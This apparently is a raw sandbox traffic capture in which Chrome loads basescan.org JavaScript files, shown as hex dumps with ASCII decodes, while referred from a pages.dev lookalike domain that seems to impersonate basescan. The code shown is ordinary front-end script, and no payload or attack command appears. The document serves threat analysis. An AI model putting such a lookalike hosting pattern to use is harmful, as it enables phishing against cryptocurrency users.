                                                                                                                                                                                                                                              Data Ascii: ction(t,i){o.blocks.each(function(t,e){if(i===e){var n=s(e);o.blocks.splice(t,1),l["private"].modernBrowser?(n.one(l["private"].animationend,function(){n.remove()}),n.addClass("cbp-removeItem")):n.remove()}})}),o.blocks.each(function(t,e){s(e).data("cbp")
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 77 69 64 74 68 41 6e 64 47 61 70 22 2c 22 68 65 69 67 68 74 41 6e 64 47 61 70 22 2c 21 30 29 2c 76 6f 69 64 20 74 2e 6d 6f 73 61 69 63 4c 61 79 6f 75 74 28 29 3b 74 2e 67 65 6e 65 72 61 74 65 46 31 46 32 28 69 2e 73 70 61 63 65 49 6e 64 65 78 2c 69 2e 64 61 74 61 42 6c 6f 63 6b 29 2c 74 2e 67 65 6e 65 72 61 74 65 47 31 47 32 47 33 47 34 28 69 2e 64 61 74 61 42 6c 6f 63 6b 29 2c 74 2e 63 6c 65 61 6e 46 72 65 65 53 70 61 63 65 73 28 29 2c 74 2e 61 64 64 48 65 69 67 68 74 54 6f 42 6c 6f 63 6b 73 28 29 7d 74 2e 62 6c 6f 63 6b 73 41 72 65 53 6f 72 74 65 64 26 26 74 2e 73 6f 72 74 42 6c 6f 63 6b 73 28 74 2e 62 6c 6f 63 6b 73 4f 6e 2c 22 74 6f 70 4e 65 77 22 2c 22 6c 65 66 74 4e 65 77 22 29 7d 2c 67 65 74 53 70 61 63 65 49 6e 64 65 78 41 6e 64 42 6c 6f 63 6b 3a
                                                                                                                                                                                                                                              Data Ascii: widthAndGap","heightAndGap",!0),void t.mosaicLayout();t.generateF1F2(i.spaceIndex,i.dataBlock),t.generateG1G2G3G4(i.dataBlock),t.cleanFreeSpaces(),t.addHeightToBlocks()}t.blocksAreSorted&&t.sortBlocks(t.blocksOn,"topNew","leftNew")},getSpaceIndexAndBlock:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              90192.168.2.549831104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC594OUTGET /assets/js/hs.core.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 3993
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=9001
                                                                                                                                                                                                                                              ETag: "80511f6b25dad91:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 29 Aug 2023 03:03:43 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90482
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dCUo2DEAYuhCqrF17qGTZIUp1YNyeCkTbEuJKkf7cwS43xUviT8Y3KsIxHT%2FgInVotsjmnq8jWDOAzGs2v90Gux3%2FwAhRaw1BdFO4LZ4HS3eJzAxoUeubSfLS31Rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dc084743e6-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC497INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 24 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 5d 27 29 2e 74 6f 6f 6c 74 69 70 28 7b 74 72 69 67 67 65 72 3a 27 68 6f 76 65 72 27 7d 29 3b 24 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 70 6f 70 6f 76 65 72 22 5d 27 29 2e 70 6f 70 6f 76 65 72 28 7b 74 72 69 67 67 65 72 3a 27 68 6f 76 65 72 27 7d 29 3b 24 2e 48 53 43 6f 72 65 2e 68 65 6c 70 65 72 73 2e 64 61 72 6b 4d 6f 64 65 28 29 3b 24 2e 48 53 43 6f 72 65 2e 68 65 6c 70 65 72 73 2e 64 65 74 65 63 74 49 45 28 29 3b 24 2e 48 53
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore={init:function(){$(document).ready(function(e){$('[data-toggle="tooltip"]').tooltip({trigger:'hover'});$('[data-toggle="popover"]').popover({trigger:'hover'});$.HSCore.helpers.darkMode();$.HSCore.helpers.detectIE();$.HS
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 6f 69 6e 74 29 3a 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 65 6e 64 50 6f 69 6e 74 2d 73 74 61 72 74 50 6f 69 6e 74 2b 31 29 29 2b 73 74 61 72 74 50 6f 69 6e 74 29 3b 7d 7d 2c 64 61 72 6b 4d 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 27 23 64 61 72 6b 4d 6f 64 61 42 74 6e 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 27 62 6f 64 79 27 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 64 61 72 6b 2d 6d 6f 64 65 27 29 3b 69 66 28 24 28 27 62 6f 64 79 27 29 2e 68 61 73 43 6c 61 73 73 28 27 64 61 72 6b 2d 6d 6f 64 65 27 29 29 7b 77 72 69 74 65 43 6f 6f 6b 69 65 28 22 64 69 73 70 6c 61 79 6d 6f 64 65 22 2c 22 64 61 72 6b 22 29 3b 24 28 27 23 64 61 72 6b 4d 6f 64 61 42 74 6e 49 63 6f
                                                                                                                                                                                                                                              Data Ascii: oint):(Math.floor(Math.random()*(endPoint-startPoint+1))+startPoint);}},darkMode:function(){$('#darkModaBtn').on('click',function(){$('body').toggleClass('dark-mode');if($('body').hasClass('dark-mode')){writeCookie("displaymode","dark");$('#darkModaBtnIco
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 69 6d 61 67 65 27 2c 27 75 72 6c 28 22 2f 61 73 73 65 74 73 2f 73 76 67 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 73 2f 64 61 70 70 2d 62 67 2e 73 76 67 22 29 27 29 3b 7d 0a 69 66 28 74 79 70 65 6f 66 20 6c 6f 61 64 64 69 73 71 75 73 21 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 26 26 24 2e 69 73 46 75 6e 63 74 69 6f 6e 28 6c 6f 61 64 64 69 73 71 75 73 29 29 7b 69 66 28 64 69 73 71 75 73 6c 6f 61 64 65 64 3d 3d 3d 74 72 75 65 29 7b 64 69 73 71 75 73 6c 6f 61 64 65 64 3d 66 61 6c 73 65 3b 6c 6f 61 64 64 69 73 71 75 73 28 29 3b 7d 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 72 69 74 65 43 6f 6f 6b 69 65 28 6b 65 79 2c 76 61 6c 75 65 2c 64 61 79 73 29 7b 76 61 72 20 64 61 74 65 3d 6e 65 77 20 44 61 74 65 28 29 3b 64 61 79 73 3d 64 61 79 73 7c 7c 33 36 35 3b 64 61 74
                                                                                                                                                                                                                                              Data Ascii: image','url("/assets/svg/illustrations/dapp-bg.svg")');}if(typeof loaddisqus!=='undefined'&&$.isFunction(loaddisqus)){if(disqusloaded===true){disqusloaded=false;loaddisqus();}}});function writeCookie(key,value,days){var date=new Date();days=days||365;dat
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC758INData Raw: 28 24 74 68 69 73 2e 68 61 73 43 6c 61 73 73 28 27 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 78 6c 27 29 29 62 72 65 61 6b 70 6f 69 6e 74 3d 62 72 65 61 6b 70 6f 69 6e 74 73 4d 61 70 5b 27 78 6c 27 5d 3b 65 6c 73 65 20 69 66 28 24 74 68 69 73 2e 68 61 73 43 6c 61 73 73 28 27 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 27 29 29 62 72 65 61 6b 70 6f 69 6e 74 3d 62 72 65 61 6b 70 6f 69 6e 74 73 4d 61 70 5b 27 6c 67 27 5d 3b 65 6c 73 65 20 69 66 28 24 74 68 69 73 2e 68 61 73 43 6c 61 73 73 28 27 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6d 64 27 29 29 62 72 65 61 6b 70 6f 69 6e 74 3d 62 72 65 61 6b 70 6f 69 6e 74 73 4d 61 70 5b 27 6d 64 27 5d 3b 65 6c 73 65 20 69 66 28 24 74 68 69 73 2e 68 61 73 43 6c 61 73 73 28 27 6e 61 76 62 61 72 2d 65 78 70 61 6e 64
                                                                                                                                                                                                                                              Data Ascii: ($this.hasClass('navbar-expand-xl'))breakpoint=breakpointsMap['xl'];else if($this.hasClass('navbar-expand-lg'))breakpoint=breakpointsMap['lg'];else if($this.hasClass('navbar-expand-md'))breakpoint=breakpointsMap['md'];else if($this.hasClass('navbar-expand


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              91192.168.2.549833104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC607OUTGET /assets/js/components/hs.header.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 30691
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=47996
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58862
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQQ%2BJM%2F6bzgczFyrPjLwLivtamXML1%2BKy102KebmmN3sPwbdM91wNAcUjUiIZLrRP%2BJcojwaR5D0YgsjV4EaLWAO8pbROUMhZzVVrYQZMC6NSJHOj%2F%2BBROou3HCENw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2dcbc8d8c2d-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC488INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 48 65 61 64 65 72 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 68 65 61 64 65 72 46 69 78 4d 6f 6d 65 6e 74 3a 30 2c 68 65 61 64 65 72 46 69 78 45 66 66 65 63 74 3a 27 73 6c 69 64 65 27 2c 62 72 65 61 6b 70 6f 69 6e 74 73 4d 61 70 3a 7b 27 6d 64 27 3a 37 36 38 2c 27 73 6d 27 3a 35 37 36 2c 27 6c 67 27 3a 39 39 32 2c 27 78 6c 27 3a 31 32 30 30 7d 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 7b 69 66 28 21 65 6c 65 6d 65 6e 74 7c 7c 65 6c 65 6d 65 6e 74 2e 6c 65 6e 67 74 68 21 3d 3d 31 7c 7c 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 27 48 53 48 65 61 64 65 72 27 29 29 72 65 74 75 72 6e 3b
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSHeader={_baseConfig:{headerFixMoment:0,headerFixEffect:'slide',breakpointsMap:{'md':768,'sm':576,'lg':992,'xl':1200}},init:function(element){if(!element||element.length!==1||element.data('HSHeader'))return;
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 2e 63 6f 6e 66 69 67 2c 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 29 29 3b 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 73 63 72 6f 6c 6c 2e 75 48 65 61 64 65 72 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3c 28 24 28 65 6c 65 6d 65 6e 74 29 2e 64 61 74 61 28 27 68 65 61 64 65 72 2d 66 69 78 2d 6d 6f 6d 65 6e 74 27 29 2d 31 30 30 29 26 26 24 28 65 6c 65 6d 65 6e 74 29 2e 64 61 74 61 28 27 65 66 66 65 63 74 2d 63 6f 6d 70 65 6e 73 61 74 69 6f 6e 27 29 3d 3d 3d 74 72 75 65 29 7b 24 28 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 7b 74 6f 70 3a 2d 28 24 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 29 7d 29 2e 61 64 64 43 6c 61 73 73 28 24 28 65 6c 65 6d 65 6e 74 29 2e 64 61 74 61 28
                                                                                                                                                                                                                                              Data Ascii: .config,this.observers));$(window).on('scroll.uHeader',function(e){if($(window).scrollTop()<($(element).data('header-fix-moment')-100)&&$(element).data('effect-compensation')===true){$(element).css({top:-($(window).scrollTop())}).addClass($(element).data(
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 65 6e 74 53 68 6f 77 48 69 64 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 65 6c 73 65 20 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 74 6f 67 67 6c 65 2d 73 65 63 74 69 6f 6e 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 78 73 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 48 69 64 65 53 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 6c 6f 67 6f 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 78 73 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67
                                                                                                                                                                                                                                              Data Ascii: entShowHideObserver(this.element));}else if(this.element.hasClass('u-header--toggle-section')){observers['xs'].push(new HSHeaderHideSectionObserver(this.element));}if(this.element.hasClass('u-header--change-logo')){observers['xs'].push(new HSHeaderChang
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 41 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 61 62 73 2d 62 6f 74 74 6f 6d 27 29 7c 7c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 61 62 73 2d 74 6f 70 2d 32 6e 64 2d 73 63 72 65 65 6e 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 78 73 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 53 74 69 63 6b 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64
                                                                                                                                                                                                                                              Data Ascii: (new HSHeaderChangeAppearanceObserver(this.element));}}if(this.element.hasClass('u-header--abs-bottom')||this.element.hasClass('u-header--abs-top-2nd-screen')){observers['xs'].push(new HSHeaderStickObserver(this.element));if(this.element.hasClass('u-head
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 76 75 6c 6e 65 72 61 62 6c 65 2d 73 6d 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 73 6d 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 57 69 74 68 6f 75 74 42 65 68 61 76 69 6f 72 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 73 74 69 63 6b 79 2d 62 6f 74 74 6f 6d 2d 73 6d 27 29 29 7b 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 61 70 70 65 61 72 61 6e 63 65 2d 73 6d 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 73 6d 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 41 70 70 65 61 72 61 6e 63
                                                                                                                                                                                                                                              Data Ascii: vulnerable-sm')){observers['sm'].push(new HSHeaderWithoutBehaviorObserver(this.element));}if(this.element.hasClass('u-header--sticky-bottom-sm')){if(this.element.hasClass('u-header--change-appearance-sm')){observers['sm'].push(new HSHeaderChangeAppearanc
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 68 61 73 2d 68 69 64 64 65 6e 2d 65 6c 65 6d 65 6e 74 2d 6d 64 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6d 64 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 48 61 73 48 69 64 64 65 6e 45 6c 65 6d 65 6e 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 73 74 69 63 6b 79 2d 74 6f 70 2d 6d 64 27 29 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 31 29 3b 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 73 68 6f 77 2d 68 69 64 65 2d 6d 64 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6d 64 27 5d 2e 70 75 73 68 28 6e 65 77
                                                                                                                                                                                                                                              Data Ascii: asClass('u-header--has-hidden-element-md')){observers['md'].push(new HSHeaderHasHiddenElement(this.element));}if(this.element.hasClass('u-header--sticky-top-md')){console.log(1);if(this.element.hasClass('u-header--show-hide-md')){observers['md'].push(new
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 73 68 6f 77 2d 68 69 64 65 2d 6d 64 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6d 64 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 53 68 6f 77 48 69 64 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 6c 6f 67 6f 2d 6d 64 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6d 64 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 4c 6f 67 6f 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68
                                                                                                                                                                                                                                              Data Ascii: hasClass('u-header--show-hide-md')){observers['md'].push(new HSHeaderShowHideObserver(this.element));}if(this.element.hasClass('u-header--change-logo-md')){observers['md'].push(new HSHeaderChangeLogoObserver(this.element));}if(this.element.hasClass('u-h
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 61 70 70 65 61 72 61 6e 63 65 2d 6c 67 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6c 67 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 41 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 66 6c 6f 61 74 69 6e 67 2d 6c 67 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6c 67 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 46 6c 6f 61 74 69 6e 67 4f
                                                                                                                                                                                                                                              Data Ascii: Observer(this.element));}if(this.element.hasClass('u-header--change-appearance-lg')){observers['lg'].push(new HSHeaderChangeAppearanceObserver(this.element));}}if(this.element.hasClass('u-header--floating-lg')){observers['lg'].push(new HSHeaderFloatingO
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 29 3b 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 61 70 70 65 61 72 61 6e 63 65 2d 6c 67 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6c 67 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 41 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 7b 66 69 78 50 6f 69 6e 74 53 65 6c 66 3a 74 72 75 65 7d 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 6c 6f 67 6f 2d 6c 67 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 6c 67 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 4c 6f 67 6f 4f
                                                                                                                                                                                                                                              Data Ascii: );if(this.element.hasClass('u-header--change-appearance-lg')){observers['lg'].push(new HSHeaderChangeAppearanceObserver(this.element,{fixPointSelf:true}));}if(this.element.hasClass('u-header--change-logo-lg')){observers['lg'].push(new HSHeaderChangeLogoO
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 73 5b 27 78 6c 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 41 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 63 68 61 6e 67 65 2d 6c 6f 67 6f 2d 78 6c 27 29 29 7b 6f 62 73 65 72 76 65 72 73 5b 27 78 6c 27 5d 2e 70 75 73 68 28 6e 65 77 20 48 53 48 65 61 64 65 72 43 68 61 6e 67 65 4c 6f 67 6f 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 3b 7d 7d 0a 69 66 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 27 75 2d 68 65 61 64 65 72 2d 2d 61 62 73 2d 74 6f 70 2d 78 6c 27 29 7c 7c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 68
                                                                                                                                                                                                                                              Data Ascii: s['xl'].push(new HSHeaderChangeAppearanceObserver(this.element));}if(this.element.hasClass('u-header--change-logo-xl')){observers['xl'].push(new HSHeaderChangeLogoObserver(this.element));}}if(this.element.hasClass('u-header--abs-top-xl')||this.element.h


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              92192.168.2.549835172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
